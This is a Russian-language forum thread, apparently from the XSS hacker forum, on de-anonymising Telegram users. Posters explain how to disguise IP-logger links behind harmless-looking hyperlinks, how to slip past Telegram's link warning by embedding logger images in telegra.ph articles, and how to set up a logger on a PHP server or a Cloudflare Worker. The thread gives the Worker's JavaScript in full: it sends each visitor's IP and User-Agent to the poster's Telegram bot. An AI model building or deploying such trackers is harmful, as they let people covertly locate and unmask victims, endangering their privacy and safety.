Я думаю многие столкнулись с той же проблемой что и я, а именно никак не могут получить логи и тд, так что же сейчас можно сделать с людьми на виртуальных/физических номерах вообще?(если садить на логгер, то подскажите как его получше маскировать)
-
XSS.stack #1 – первый литературный журнал от юзеров форума
Какие способы деанонимизации сейчас вообще есть в Telegram?
Во-первых, деанонимизация коллег - это всегда плохо, неважно как тебя обидели. Тут моральная сторона вопроса. Надеюсь речь идет не о коллегах.
Начинать нужно всегда с OSINT ботов, тот же Глаз Боба. Много новичков или беспечных людей допускают стандартный набор ошибок, которые потом видно в боте.
Как маскировать логгер? (так понимаю айпилоггер)
1. Зачем тебе айпи?))
2. Как банальный способ - через гиперссылку. Отправляешь гиперссылку подписывая ее в формате обычной ссылки.
И так, название скажем youtube.com/sralaperdela, а линк внутри iplogger.sru. Человек по неосторожности может не заметить подмену и проигнорировать всплывающее окно с предупреждением куда ведет ссылка на самом деле. В телеге работает не очень из-за все того же всплывающего окна, а на форумах - отличное средство.
Вот тебе пример:
https://lifehacker.ru/kak-pravilno-kakat/ - ведет в мой профиль
https://lifehacker.ru/kak-pravilno-kakat/ - ведет на обучающий контент.
Начинать нужно всегда с OSINT ботов, тот же Глаз Боба. Много новичков или беспечных людей допускают стандартный набор ошибок, которые потом видно в боте.
Как маскировать логгер? (так понимаю айпилоггер)
1. Зачем тебе айпи?))
2. Как банальный способ - через гиперссылку. Отправляешь гиперссылку подписывая ее в формате обычной ссылки.
И так, название скажем youtube.com/sralaperdela, а линк внутри iplogger.sru. Человек по неосторожности может не заметить подмену и проигнорировать всплывающее окно с предупреждением куда ведет ссылка на самом деле. В телеге работает не очень из-за все того же всплывающего окна, а на форумах - отличное средство.
Вот тебе пример:
https://lifehacker.ru/kak-pravilno-kakat/ - ведет в мой профиль
https://lifehacker.ru/kak-pravilno-kakat/ - ведет на обучающий контент.
Разговоры в реальном времени (аудио-звонок) между пользователями в приложениях: Вайбер, Телеграм.
Записываются куда-то на их сервера т.е. сохраняют разговоры? Может кто знает за это?
Записываются куда-то на их сервера т.е. сохраняют разговоры? Может кто знает за это?
Последнее редактирование:
How did you do that redirection? you drove me crazy, I haven't seen any difference in the url wtf
Нет. В этом нет никакого смысла, только расходы.
Тогда вопрос. Почему за онлайн-игроками в играх "собирает данные логов чатов и записи ведения голосовых переговоров в играх": gamebomb.ru/gbnews/8051
А в Телеграме, Вайбере такое не могут сделать?
не почему , а зачем ...
для отслеживания подозрительной активности и деанонимизации пользователей сети , в контексте статьи доступ к серверам компании для этого не нужен
в Телеграме и Вайбере спецслужбы такое сделать могут , только если получат доступ к серверам и найдут ресурсы для разбора кучи ненужного ... .
для отслеживания подозрительной активности и деанонимизации пользователей сети , в контексте статьи доступ к серверам компании для этого не нужен
в Телеграме и Вайбере спецслужбы такое сделать могут , только если получат доступ к серверам и найдут ресурсы для разбора кучи ненужного ... .
Код:
[URL='https://xss.pro/members/277567/']https://lifehacker.ru/kak-pravilno-kakat/[/URL]
[URL]https://lifehacker.ru/kak-pravilno-kakat/[/URL]https://lifehacker.ru/kak-pravilno-kakat/
https://lifehacker.ru/kak-pravilno-kakat/
СМИ сообщали, что им(спецслужбам) отдали ключи шифрования для Телеграм.
Если они знают номера двух абонентов, могут читать переписку в режиме онлайн?
Получается, что всё равно нужно делать запросы в компанию? Развенчайте мифы...
1. через свой домен+сервер, 2. или же через домен+cloudflare workers (без сервера)
тогда не понадобится делать гиперссылку, оповещение о которой всплывает в телеграм
1. заходишь на шелл/используешь свой домен и сервер (можешь найти сервисы где бесплатно предоставляют то и то)
1.1. пишешь простой код php который будет записывать в файл айпи и нужные данные браузера (попроси сделать это любую ИИ, если не умеешь)
1.2. создаешь папку, допустим very-interesting-thing, это будет урл
1.3. закидываешь туда свой файл index.php
1.4. проверяешь работоспособность
2. использовать cloudflare workers
2.1. регаешь акк на cloudflare и подтверждаешь почту
2.2. переходишь в https://dash.cloudflare.com/?to=/:account/workers-and-pages
2.3. создаешь воркера, называешь проект как хочешь, я назову
project-name-test2.4. после создания, нажимаешь на "Edit code"
2.5 пишешь простенький js код, который будет отправлять айпи и юзерагент в телергам бота, я взял код написанный ИИ. можешь добавить какие нибудь другие данные, по типу языка браузера.
JavaScript:
addEventListener('fetch', event => {
event.respondWith(handleRequest(event.request))
})
async function handleRequest(request) {
const url = new URL(request.url);
// Проверяем, совпадает ли путь с /something-interesting/
if (url.pathname === '/something-interesting/') {
// Получаем IP адрес
const clientIP = request.headers.get('cf-connecting-ip');
// Получаем информацию о браузере
const userAgent = request.headers.get('User-Agent');
// Отправляем данные в Telegram
await sendToTelegram(clientIP, userAgent);
// Возвращаем ответ
return new Response('Information has been sent to Telegram', {
headers: { 'content-type': 'text/plain' },
});
} else {
// Возвращаем ответ для других путей
return new Response('This page is not tracked.', {
headers: { 'content-type': 'text/plain' },
});
}
}
async function sendToTelegram(ip, userAgent) {
// Ваш токен бота
const botToken = 'YOUR_TELEGRAM_BOT_TOKEN';
// Ваш ID чата
const chatId = 'YOUR_CHAT_ID';
// Сообщение, которое будет отправлено в Telegram
const message = `New visitor:\nIP: ${ip}\nUser-Agent: ${userAgent}`;
// URL для отправки сообщения
const telegramUrl = `https://api.telegram.org/bot${botToken}/sendMessage`;
// Настройка опций для fetch запроса
const options = {
method: 'POST',
headers: {
'Content-Type': 'application/json'
},
body: JSON.stringify({
chat_id: chatId,
text: message
})
};
// Отправка запроса в Telegram API
await fetch(telegramUrl, options);
}2.6. ты можешь добавить свой домен к клауду, что бы воркер работал через твой домен, а не через домен
project-name-test.<accountname>.workers.devделается это в настройках воркера, проект>settings>triggers> Add Route. zone - твой домен, route -
*.domainexample.com/* (на всех страницах И на любом сабдомене который работает), domainexample.com/stranica (только на stranica и только на domainexample.com)
Доброй ночи, логично, что ключи есть у спец. служб, т.к. иначе Telegram был бы заблокирован на территории РФ. Если ключи есть, то переписка может быть прочитана. Однако бытует информация, что у них нет доступа к secret-чатам. Сам Дуров утверждает, что даже у него нет этих ключей. Вопрос анонимности Telegram под вопросом, лучше использовать другие мессенджеры для общения.
Не соглашусь на счет телеги. Чтобы обойти всплывающее окно, о переходе на внешний ресурс в телеге, можно вставить код IP-логера в telegra.ph, красиво это спрятать за картинкой или статьей и нет проблем. Телега трастово относится к telegra.ph и всплывающее окно не появляется при попытке открыть линк.
Бро, что такое: "вставить код IP-логера в telegra.ph" ? Код логера нa markdown? )
1. вставляешь линк на картинку/видео с логгером
2. жертва открывает статью во встроенном браузере и прогружает картинку/видео со своего айпи
Ниже тебе отписали всю схему
а как же остаточные пакеты?
не понимаю смысла садить на айпи логер, никто не кликнет это первое, а второе ты с ним ниче не сделаешь, щас практически у всех он динамический ( ну ток если чувак не в селе на 100 человек живет )
очевидно что у каждого первого щас купленные акки в тг, тут дело не в номерах
искать надо по неймам, тебе фанстата гбшки и дорков с головой хватит на 80% пользователей телеги
